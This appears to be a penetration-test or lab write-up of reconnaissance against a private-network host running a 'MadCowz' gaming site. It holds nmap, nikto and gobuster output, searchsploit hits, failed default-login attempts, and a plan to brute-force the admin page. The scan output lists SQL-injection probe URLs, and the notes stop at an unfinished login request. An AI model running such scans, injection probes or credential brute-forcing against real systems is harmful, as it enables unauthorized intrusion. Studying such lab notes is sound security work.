Scribd
Upload
50 views36 pages

UT99

The Nmap scan of the host 192.168.236.44 revealed multiple open ports including FTP, HTTP, and MySQL services, with potential vulnerabilities such as CSRF and Slowloris DOS attack. The HTTP server is running Apache 2.4.16 with PHP 5.6.12, and there are several IRC services active on various ports. Additionally, the scan indicated issues with SSL/TLS configurations and possible SQL injection vulnerabilities on the web application.

Uploaded by

Vo Tinh
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
50 views36 pages

UT99

The Nmap scan of the host 192.168.236.44 revealed multiple open ports including FTP, HTTP, and MySQL services, with potential vulnerabilities such as CSRF and Slowloris DOS attack. The HTTP server is running Apache 2.4.16 with PHP 5.6.12, and there are several IRC services active on various ports. Additionally, the scan indicated issues with SSL/TLS configurations and possible SQL injection vulnerabilities on the web application.

Uploaded by

Vo Tinh
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 36

$ nmap -sV -sC -A -Pn 192.168.236.

44
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-01 08:01 EST
Nmap scan report for 192.168.236.44
Host is up (0.13s latency).
Not shown: 978 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
80/tcp open http Apache httpd 2.4.16 (OpenSSL/1.0.1p PHP/5.6.12)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.16 (Win32) OpenSSL/1.0.1p PHP/5.6.12
|_http-title: Index of /
443/tcp open ssl/http Apache httpd 2.4.16 (OpenSSL/1.0.1p PHP/5.6.12)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.16 (Win32) OpenSSL/1.0.1p PHP/5.6.12
|_http-title: Index of /
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
3306/tcp open mysql MySQL (unauthorized)
6666/tcp open irc InspIRCd
6667/tcp open irc InspIRCd
6668/tcp open irc InspIRCd
6669/tcp open irc InspIRCd
6689/tcp open irc InspIRCd
6692/tcp open irc InspIRCd
6699/tcp open irc InspIRCd
6779/tcp open irc InspIRCd
6788/tcp open irc InspIRCd
6789/tcp open irc InspIRCd
| irc-info:
| server: irc.madcowz.localdomain
| users: 3
| servers: 1
| chans: 1
| lusers: 3
| lservers: 0
| source ident: nmap
| source host: 192.168.49.236
|_ error: Closing link: (nmap@192.168.49.236) [Client exited]
6792/tcp open irc InspIRCd
6839/tcp open irc InspIRCd
| irc-info:
| server: irc.madcowz.localdomain
| users: 2
| servers: 1
| chans: 1
| lusers: 2
| lservers: 0
| source ident: nmap
| source host: 192.168.49.236
|_ error: Closing link: (nmap@192.168.49.236) [Client exited]
6881/tcp open irc InspIRCd
6901/tcp open irc InspIRCd
6969/tcp open irc InspIRCd
| irc-info:
| server: irc.madcowz.localdomain
| users: 4
| servers: 1
| chans: 1
| lusers: 4
| lservers: 0
| source ident: nmap
| source host: 192.168.49.236
|_ error: Closing link: (nmap@192.168.49.236) [Client exited]
7000/tcp open irc InspIRCd
7001/tcp open tcpwrapped
7007/tcp open irc InspIRCd
Service Info: Hosts: localhost, www.example.com, irc.madcowz.localdomain; OS:
Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at


https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.25 seconds

$ nmap -Pn -p- --script vuln 192.168.236.44


Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-01 08:06 EST
Nmap scan report for 192.168.236.44
Host is up (0.11s latency).
Not shown: 65190 filtered ports
PORT STATE SERVICE
21/tcp open ftp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
80/tcp open http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.236.44
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.236.44:80/public_html/
| Form id:
| Form action: /public_html/
|
| Path: http://192.168.236.44:80/public_html/index.php?
name=Your_Account&profile=kermit
| Form id:
| Form action: /public_html/index.php?name=Your_Account&profile=kermit
|
| Path: http://192.168.236.44:80/public_html/index.php?
name=Your_Account&profile=kermit
| Form id: ulogin2
|_ Form action: index.php?name=Your_Account
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /: Root directory w/ listing on 'apache/2.4.16 (win32) openssl/1.0.1p php/5.6.12'
| /phpmyadmin/: phpMyAdmin
|_ /icons/: Potentially interesting folder w/ directory listing
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.236.44:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=S%3bO%3dD%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=D%3bO%3dD%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=M%3bO%3dD%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|_ http://192.168.236.44:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
443/tcp open https
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.236.44
| Found the following possible CSRF vulnerabilities:
|
| Path: https://192.168.236.44:443/public_html/
| Form id:
|_ Form action: /public_html/
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /: Root directory w/ listing on 'apache/2.4.16 (win32) openssl/1.0.1p php/5.6.12'
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: RFC2409/Oakley Group 2
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
|_sslv2-drown:
3306/tcp open mysql
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
6660/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6661/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6662/tcp open radmind
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6663/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6664/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| irc-botnet-channels:
|_ ERROR: Closing link: (unknown@192.168.49.236) [No more connections allowed from
your host via this connect class (local)]
6665/tcp open irc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| irc-botnet-channels:
|_ ERROR: TIMEOUT
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects.
Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this
message again).
6666/tcp open irc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| irc-botnet-channels:
|_ ERROR: Closing link: (unknown@192.168.49.236) [No more connections allowed from
your host via this connect class (local)]
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects.
Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this
message again).
6667/tcp open irc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| irc-botnet-channels:
|_ ERROR: TIMEOUT
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects.
Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this
message again).
6668/tcp open irc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| irc-botnet-channels:
|_ ERROR: Closing link: (unknown@192.168.49.236) [No more connections allowed from
your host via this connect class (local)]
6669/tcp open irc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| irc-botnet-channels:
|_ ERROR: TIMEOUT
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects.
Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this
message again).
6670/tcp open irc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| irc-botnet-channels:
|_ ERROR: Closing link: (unknown@192.168.49.236) [No more connections allowed from
your host via this connect class (local)]
6671/tcp open p4p-portal
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6672/tcp open vision_server
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6673/tcp open vision_elmd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6674/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6675/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6676/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6677/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6678/tcp open vfbp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6679/tcp open osaut
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| irc-botnet-channels:
|_ ERROR: Closing link: (unknown@192.168.49.236) [No more connections allowed from
your host via this connect class (local)]
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
… (unknown)
6687/tcp open clever-ctrace
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6688/tcp open clever-tcpip
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6689/tcp open tsa
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6690/tcp open cleverdetect
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6691/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6692/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6693/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6694/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6695/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6696/tcp open babel
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6697/tcp open ircs-u
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| irc-botnet-channels:
|_ ERROR: Closing link: (unknown@192.168.49.236) [No more connections allowed from
your host via this connect class (local)]
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
6698/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6699/tcp open napster
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6700/tcp open carracho
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6701/tcp open carracho
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6702/tcp open e-design-net
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6703/tcp open e-design-web
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6714/tcp open ibprotocol
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6715/tcp open fibotrader-com
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6716/tcp open princity-agent
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6767/tcp open bmc-perf-agent
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6768/tcp open bmc-perf-mgrd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6769/tcp open adi-gxp-srvprt
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6770/tcp open plysrv-http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6771/tcp open plysrv-https
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6777/tcp open ntz-tracker
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6778/tcp open ntz-p2p-storage
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6784/tcp open bfd-lag
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6785/tcp open dgpf-exchg
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6786/tcp open smc-jmx
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6787/tcp open smc-admin
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6788/tcp open smc-http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6789/tcp open ibm-db2-admin
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6790/tcp open hnmp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6791/tcp open hnm
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6801/tcp open acnet
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6817/tcp open pentbox-sim
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6841/tcp open netmo-default
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6850/tcp open iccrushmore
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6868/tcp open acctopus-cc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6881/tcp open bittorrent-tracker
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6888/tcp open muse
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6900/tcp open rtimeviewer
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6901/tcp open jetstream
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6935/tcp open ethoscan
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6946/tcp open bioserver
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6951/tcp open otlp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6961/tcp open jmact3
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6962/tcp open jmevt2
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6963/tcp open swismgr1
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6964/tcp open swismgr2
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6965/tcp open swistrap
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6966/tcp open swispol
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6969/tcp open acmsoda
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6970/tcp open conductor
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6997/tcp open MobilitySrv
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6998/tcp open iatp-highpri
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6999/tcp open iatp-normalpri
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
7000/tcp open afs3-fileserver
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| irc-botnet-channels:
|_ ERROR: TIMEOUT
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects.
Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this
message again).
7001/tcp open afs3-callback
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
7005/tcp open afs3-volser
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
7007/tcp open afs3-bos
|_clamav-exec: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 985.11 seconds

@ http://192.168.236.44/

@ http://192.168.236.44/public_html/

● MadCowz gaming site


● CPG Dragonfly CMS: Copyright (c) 2003-2020 by CPG-Nuke Development Team,
http://dragonflycms.org
● @ http://192.168.236.44/public_html/robots.txt
User-agent: Baidu
Disallow: /

User-agent: *alexa*
Disallow: /

User-agent: Googlebot-Image
Disallow: /

User-agent: Fasterfox
Disallow: /

User-agent: *
Crawl-delay: 20
Disallow: /admin.php
Disallow: /error.php
Disallow: /admin/
Disallow: /blocks/
Disallow: /cache/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /modules/
Disallow: /themes/

// Nothing here
$ gobuster dir -u 192.168.242.44 -w /usr/share/wordlists/dirbuster/directory-list-2.3-
medium.txt -t 4 -q -x html,txt,php
/security (Status: 403)
/security.html (Status: 403)
/security.txt (Status: 403)
/security.php (Status: 403)
/Security (Status: 403)
/Security.php (Status: 403)
/Security.html (Status: 403)
/Security.txt (Status: 403)
/licenses (Status: 403)
/licenses.txt (Status: 403)
/licenses.php (Status: 403)
/licenses.html (Status: 403)
^C

$ nikto -h 192.168.236.44
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.236.44
+ Target Hostname: 192.168.236.44
+ Target Port: 80
+ Start Time: 2020-11-01 08:01:39 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.16 (Win32) OpenSSL/1.0.1p PHP/5.6.12
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to
protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render
the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /: Directory indexing found.
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily
brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The
following alternatives for 'index' were found: HTTP_NOT_FOUND.html.var,
HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var,
HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var,
HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var,
HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var,
HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var,
HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var,
HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var,
HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var,
HTTP_NOT_FOUND.html.var
+ OpenSSL/1.0.1p appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and
0.9.8zc are also current.
+ Apache/2.4.16 appears to be outdated (current is at least Apache/2.4.37). Apache
2.2.34 is the EOL for the 2.x branch.
+ PHP/5.6.12 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27,
7.1.13, 7.2.1 may also current release for each branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /./: Directory indexing found.
+ /./: Appending '/./' to a directory allows indexing
+ OSVDB-3268: //: Directory indexing found.
+ //: Apache on Red Hat Linux release 9 reveals the root directory listing by default if there
is no index page.
+ OSVDB-3268: /%2e/: Directory indexing found.
+ OSVDB-576: /%2e/: Weblogic allows source code or directory listing, upgrade to v6.0
SP1 or higher. http://www.securityfocus.com/bid/2513.
+ OSVDB-3268: ///: Directory indexing found.
+ OSVDB-119: /?PageServices: The remote server may allow directory listings through
Web Publisher by forcing the server to show all files via 'open directory browsing'. Web
Publisher should be disabled. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-
0269.
+ OSVDB-119: /?wp-cs-dump: The remote server may allow directory listings through Web
Publisher by forcing the server to show all files via 'open directory browsing'. Web
Publisher should be disabled. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-
0269.
+ Retrieved x-powered-by header: PHP/5.6.12
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL
databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-
3268: //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Directory
indexing found.
+ OSVDB-
3288: //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Abyss 1.03
reveals directory listing when /'s are requested.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/README: phpMyAdmin is for managing MySQL
databases, and should be protected or limited to authorized hosts.
+ 8726 requests: 0 error(s) and 28 item(s) reported on remote host
+ End Time: 2020-11-01 08:19:44 (GMT-5) (1085 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

$ gobuster dir -u http://192.168.236.44/public_html/ -w


/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php -t 4 -q
/index.php (Status: 200)
/images (Status: 301)
/news.html (Status: 200)
/contact.html (Status: 200)
/search.html (Status: 200)
/rss (Status: 301)
/banners.php (Status: 302)
/themes (Status: 301)
/modules (Status: 301)
/uploads (Status: 301)
/header.php (Status: 200)
/Images (Status: 301)
/News.html (Status: 200)
/admin (Status: 403)
/admin.php (Status: 200)
/privacy_policy.html (Status: 200)
/footer.php (Status: 200)
/gfx.html (Status: 200)
/smilies.html (Status: 200)
/Search.html (Status: 200)
/Contact.html (Status: 200)
/credits.html (Status: 200)
/includes (Status: 301)
/Index.php (Status: 200)
/language (Status: 403)
/statistics.html (Status: 200)
/RSS (Status: 301)
/cache (Status: 403)
/blocks (Status: 403)
/Themes (Status: 301)
/config.php (Status: 403)
/NEWS.html (Status: 200)
/robots.txt (Status: 200)
/surveys.html (Status: 200)
/error.php (Status: 200)
/Banners.php (Status: 302)
/IMAGES (Status: 301)
/%20 (Status: 403)
/Rss (Status: 301)
/Header.php (Status: 200)
/INDEX.php (Status: 200)
/Language (Status: 403)
/Modules (Status: 301)
/Admin (Status: 403)
/Admin.php (Status: 200)
/*checkout* (Status: 403)
/*checkout*.html (Status: 403)
/*checkout*.txt (Status: 403)
/*checkout*.php (Status: 403)
/Statistics.html (Status: 200)
/Privacy_Policy.html (Status: 200)
/coppermine.html (Status: 200)
/Uploads (Status: 301)
/CREDITS.html (Status: 200)
/Surveys.html (Status: 200)
/*docroot* (Status: 403)
/*docroot*.html (Status: 403)
/*docroot*.txt (Status: 403)
/*docroot*.php (Status: 403)
/Config.php (Status: 403)
/Footer.php (Status: 200)
/* (Status: 403)
/*.txt (Status: 403)
/*.php (Status: 403)
/*.html (Status: 403)
/con (Status: 403)
/con.html (Status: 403)
/con.txt (Status: 403)
/con.php (Status: 403)
/SEARCH.html (Status: 200)
/CONTACT.html (Status: 200)
/Cache (Status: 403)
/Credits.html (Status: 200)
/Your_Account.html (Status: 200)
/Robots.txt (Status: 200)
/Error.php (Status: 200)
/http%3A (Status: 403)
/http%3A.html (Status: 403)
/http%3A.txt (Status: 403)
/http%3A.php (Status: 403)
/Includes (Status: 301)
/Smilies.html (Status: 200)
/**http%3a (Status: 403)
/**http%3a.html (Status: 403)
/**http%3a.txt (Status: 403)
/**http%3a.php (Status: 403)
/*http%3A (Status: 403)
/*http%3A.html (Status: 403)
/*http%3A.txt (Status: 403)
/*http%3A.php (Status: 403)
/aux (Status: 403)
/aux.html (Status: 403)
/aux.txt (Status: 403)
/aux.php (Status: 403)
/your_account.html (Status: 200)
/**http%3A (Status: 403)
/**http%3A.html (Status: 403)
/**http%3A.txt (Status: 403)
/**http%3A.php (Status: 403)
/Private_Messages.html (Status: 401)
/%C0 (Status: 403)
/%C0.html (Status: 403)
/%C0.txt (Status: 403)
/%C0.php (Status: 403)
/sr%3D8-1.html (Status: 200)

@ http://192.168.236.44/public_html/index.php?name=News&file=article&sid=1
We have our first match next Friday night against Cookie Monsters, so beloved daisy has
setup a practice server for user to get back into the swing of things.

Join IRC and Mumble to get more information.


● Posted by Fluffy on Saturday, October 03, 2015
○ Users: fluffy, kermit, daisy
@ http://192.168.236.44/public_html/index.php?name=Your_Account

● Try default creds but failed -> ERROR: “Our records do not indicate an existing
user named admin”

// Register a new user but need to confirm via email :(

@ http://192.168.236.44/public_html/admin.php
@ http://192.168.236.44/public_html/uploads/

// Searchsploit dragonfly

- CPGNuke Dragonfly 9.0.6.1 - Remote Command Execution |


php/webapps/1478.php [FAILED, don’t understand the exploit]
- Dragonfly Commerce 1.0 - Multiple SQL Injections |
asp/webapps/25963.txt [FAILED]

@ http://192.168.236.44/phpmyadmin/

● Try default creds -> don’t work


● Version 4.4.14

● @ http://192.168.236.44/phpmyadmin//Changelog

@ https://192.168.236.44:443/ -> @ https://192.168.236.44/

$ gobuster dir -u 192.168.236.44/phpmyadmin/ -w


/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 4 -x php,html,txt -q
/index.php (Status: 200)
/themes (Status: 301)
/themes.php (Status: 200)
/doc (Status: 301)
/webapp.php (Status: 200)
/Index.php (Status: 200)
/license (Status: 200)
/license.php (Status: 200)
/navigation.php (Status: 200)
/README (Status: 200)
/examples (Status: 301)
/js (Status: 301)
/libraries (Status: 301)
/changelog (Status: 200)
/changelog.php (Status: 200)
/url.php (Status: 302)
/export.php (Status: 200)
/ChangeLog (Status: 200)
/ChangeLog.php (Status: 200)
/Themes (Status: 301)
/Themes.php (Status: 200)
/readme (Status: 200)
/robots.txt (Status: 200)
/setup (Status: 301)
/sql (Status: 301)
/sql.php (Status: 200)
/LICENSE (Status: 200)
/LICENSE.php (Status: 200)
/%20 (Status: 403)
/Libraries (Status: 301)
/INDEX.php (Status: 200)
/License (Status: 200)
/License.php (Status: 200)
/SQL (Status: 301)
/SQL.php (Status: 200)
/locale (Status: 301)
/*checkout* (Status: 403)
/*checkout*.php (Status: 403)
/*checkout*.html (Status: 403)
/*checkout*.txt (Status: 403)
/import.php (Status: 200)
/Navigation.php (Status: 200)
/CHANGELOG (Status: 200)
/CHANGELOG.php (Status: 200)
/Changelog (Status: 200)
/Changelog.php (Status: 200)
/Doc (Status: 301)
/JS (Status: 301)
/dco (Status: 200)
/URL.php (Status: 302)
/Examples (Status: 301)
/Setup (Status: 301)
/*docroot* (Status: 403)
/*docroot*.php (Status: 403)
/*docroot*.html (Status: 403)
/*docroot*.txt (Status: 403)
/* (Status: 403)
/*.html (Status: 403)
/*.txt (Status: 403)
/*.php (Status: 403)
/con (Status: 403)
/con.php (Status: 403)
/con.html (Status: 403)
/con.txt (Status: 403)
/Robots.txt (Status: 200)
/ReadMe (Status: 200)
/Locale (Status: 301)
/DOC (Status: 301)
/Readme (Status: 200)
/**http%3a (Status: 403)
/**http%3a.php (Status: 403)
/**http%3a.html (Status: 403)
/**http%3a.txt (Status: 403)
/*http%3A (Status: 403)
/*http%3A.php (Status: 403)
/*http%3A.html (Status: 403)
/*http%3A.txt (Status: 403)
/aux (Status: 403)
/aux.php (Status: 403)
/aux.html (Status: 403)
/aux.txt (Status: 403)
/**http%3A (Status: 403)
/**http%3A.php (Status: 403)
/**http%3A.html (Status: 403)
/**http%3A.txt (Status: 403)
/server_status.php (Status: 200)
/DB_Search.php (Status: 200)
/phpinfo.php (Status: 200)
...

FTP: failed to connect as anonymous (MadCowz FTP)

// BurpSuite request to login on @ http://192.168.236.44/public_html/admin.php (but don’t


know how to bruteforce with Hydra)

POST /public_html/admin.php HTTP/1.1


